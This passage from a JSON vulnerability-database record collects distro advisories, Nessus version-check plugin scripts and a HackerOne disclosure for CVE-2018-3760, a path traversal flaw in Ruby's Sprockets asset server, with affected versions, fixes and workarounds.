"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-14T23:36:29", "id": "FEDORA:714376469796", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "suse": [{"lastseen": "2018-06-29T23:21:53", "description": "This update for rubygem-sprockets fixes the following issues:\n\n The following security vulnerability was addressed:\n\n - CVE-2018-3760: Fixed a directory traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed remote attackers\n to read arbitrary files via specially crafted requests. (boo#1098369)\n\n", "cvss3": {}, "published": "2018-06-29T21:15:11", "type": "suse", "title": "Security update for rubygem-sprockets (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2018-06-29T21:15:11", "id": "OPENSUSE-SU-2018:1854-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00052.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-30T13:53:37", "description": "This update for rubygem-sprockets fixes the following issues:\n\n The following security vulnerability was addressed:\n\n - CVE-2018-3760: Fixed a path traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed remote attackers\n to read arbitrary files (bsc#1098369)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "cvss3": {}, "published": "2018-07-28T16:02:02", "type": "suse", "title": "Security update for rubygem-sprockets (moderate)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2018-07-28T16:02:02", "id": "OPENSUSE-SU-2018:2124-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-07/msg00041.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2022-01-14T12:33:42", "description": "There is an information leak vulnerability in Sprockets. Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower.\n\nSpecially crafted requests can be used to access files that exists on the filesystem that is outside an application's root directory, when the Sprockets server is used in development.\n\nAll users running an affected release should either upgrade or use one of the work arounds immediately.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2021-03-12T00:00:00", "type": "nessus", "title": "Rails Sprockets 2.x < 2.12.5 / 3.x < 3.7.2 / 4.x < 4.0.0.beta8 Path Traversal", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2021-09-07T00:00:00", "cpe": ["cpe:2.3:a:sprockets_project:sprockets:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112718", "href": "https://www.tenable.com/plugins/was/112718", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-22T16:06:00", "description": "Update to Sprockets 3.7.2. Fixes CVE-2018-3760:\nhttps://access.redhat.com/security/cve/cve-2018-3760\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : rubygem-sprockets (2018-2735a12b72)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-sprockets", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-2735A12B72.NASL", "href": "https://www.tenable.com/plugins/nessus/120304", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-2735a12b72.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120304);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-3760\");\n script_xref(name:\"FEDORA\", value:\"2018-2735a12b72\");\n\n script_name(english:\"Fedora 28 : rubygem-sprockets (2018-2735a12b72)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Sprockets 3.7.2. Fixes CVE-2018-3760:\nhttps://access.redhat.com/security/cve/cve-2018-3760\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3760\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-2735a12b72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-sprockets package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"rubygem-sprockets-3.7.2-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-sprockets\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-22T16:11:33", "description": "This update for rubygem-sprockets fixes the following issues :\n\nThe following security vulnerability was addressed :\n\n - CVE-2018-3760: Fixed a path traversal issue in sprockets/server.rb:forbidden_request?(), which allowed remote attackers to read arbitrary files (bsc#1098369)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-sprockets (openSUSE-2019-542)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.5-rubygem-sprockets", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-542.NASL", "href": "https://www.tenable.com/plugins/nessus/123231", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-542.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123231);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-3760\");\n\n script_name(english:\"openSUSE Security Update : rubygem-sprockets (openSUSE-2019-542)\");\n script_summary(english:\"Check for the openSUSE-2019-542 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for rubygem-sprockets fixes the following issues :\n\nThe following security vulnerability was addressed :\n\n - CVE-2018-3760: Fixed a path traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed\n remote attackers to read arbitrary files (bsc#1098369)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098369\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-sprockets package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.5-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ruby2.5-rubygem-sprockets-3.7.2-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.5-rubygem-sprockets\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-23T16:08:18", "description": "This update for rubygem-sprockets fixes the following issues :\n\nThe following security vulnerability was addressed :\n\n - CVE-2018-3760: Fixed a directory traversal issue in sprockets/server.rb:forbidden_request?(), which allowed remote attackers to read arbitrary files via specially crafted requests. (boo#1098369)", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-07-02T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-sprockets (openSUSE-2018-686)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.1-rubygem-sprockets", "p-cpe:/a:novell:opensuse:ruby2.2-rubygem-sprockets", "p-cpe:/a:novell:opensuse:ruby2.3-rubygem-sprockets", "p-cpe:/a:novell:opensuse:ruby2.4-rubygem-sprockets", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-686.NASL", "href": "https://www.tenable.com/plugins/nessus/110831", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-686.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110831);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-3760\");\n\n script_name(english:\"openSUSE Security Update : rubygem-sprockets (openSUSE-2018-686)\");\n script_summary(english:\"Check for the openSUSE-2018-686 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for rubygem-sprockets fixes the following issues :\n\nThe following security vulnerability was addressed :\n\n - CVE-2018-3760: Fixed a directory traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed\n remote attackers to read arbitrary files via specially\n crafted requests. (boo#1098369)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098369\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-sprockets packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.2-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.3-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.4-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ruby2.1-rubygem-sprockets-3.3.5-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ruby2.2-rubygem-sprockets-3.3.5-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ruby2.3-rubygem-sprockets-3.3.5-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ruby2.4-rubygem-sprockets-3.3.5-5.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.1-rubygem-sprockets / ruby2.2-rubygem-sprockets / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-23T16:07:40", "description": "This update for rubygem-sprockets fixes the following issues :\n\nThe following security vulnerability was addressed :\n\n - CVE-2018-3760: Fixed a path traversal issue in sprockets/server.rb:forbidden_request?(), which allowed remote attackers to read arbitrary files (bsc#1098369)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-07-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-sprockets (openSUSE-2018-773)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.5-rubygem-sprockets", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2018-773.NASL", "href": "https://www.tenable.com/plugins/nessus/111425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-773.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111425);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-3760\");\n\n script_name(english:\"openSUSE Security Update : rubygem-sprockets (openSUSE-2018-773)\");\n script_summary(english:\"Check for the openSUSE-2018-773 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for rubygem-sprockets fixes the following issues :\n\nThe following security vulnerability was addressed :\n\n - CVE-2018-3760: Fixed a path traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed\n remote attackers to read arbitrary files (bsc#1098369)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098369\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-sprockets package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.5-rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ruby2.5-rubygem-sprockets-3.7.2-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.5-rubygem-sprockets\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-23T16:06:19", "description": "Orange Tsai discovered a path traversal flaw in ruby-sprockets, a Rack-based asset packaging system. A remote attacker can take advantage of this flaw to read arbitrary files outside an application's root directory via specially crafted requests, when the Sprockets server is used in production.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-07-10T00:00:00", "type": "nessus", "title": "Debian DSA-4242-1 : ruby-sprockets - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2018-11-13T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ruby-sprockets", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4242.NASL", "href": "https://www.tenable.com/plugins/nessus/110968", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4242. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110968);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/13 12:30:47\");\n\n script_cve_id(\"CVE-2018-3760\");\n script_xref(name:\"DSA\", value:\"4242\");\n\n script_name(english:\"Debian DSA-4242-1 : ruby-sprockets - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Orange Tsai discovered a path traversal flaw in ruby-sprockets, a\nRack-based asset packaging system. A remote attacker can take\nadvantage of this flaw to read arbitrary files outside an\napplication's root directory via specially crafted requests, when the\nSprockets server is used in production.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=901913\"\n );\n # https://security-tracker.debian.org/tracker/source-package/ruby-sprockets\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e0c4015a\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/ruby-sprockets\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4242\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ruby-sprockets packages.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 3.7.0-1+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"ruby-sprockets\", reference:\"3.7.0-1+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:12", "bounty": 1500.0, "description": "There is an information leak vulnerability in Sprockets. This vulnerability\nhas been assigned the CVE identifier CVE-2018-3760.\n\nVersions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower.\nNot affected: NONE\nFixed Versions: 4.0.0.beta8, 3.7.2, 2.12.5\n\nImpact\n------\nSpecially crafted requests can be used to access files that exists on\nthe filesystem that is outside an application's root directory, when the Sprockets server is\nused in production.\n\nAll users running an affected release should either upgrade or use one of the work arounds immediately.\n\nReleases\n--------\nThe 4.0.0.beta8, 3.7.2 and 2.12.5 releases are available at the normal locations.\n\nWorkarounds\n-----------\nIn Rails applications, work around this issue, set `config.assets.compile = false` and\n`config.public_file_server.enabled = true` in an initializer and precompile the assets.\n\nThis work around will not be possible in all hosting environments and upgrading is advised.\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for the three supported release series.\nThey are in git-am format and consist of a single changeset.\n\n* 4-0-fix-path-traversal.patch - Patch for the 4.0.x release series\n* 3-7-fix-path-traversal.patch - Patch for the 3.7.x release series\n* 2-12-fix-path-traversal.patch - Patch for the 2.12.x release series\n\nCredits\n-------\n\nThanks to 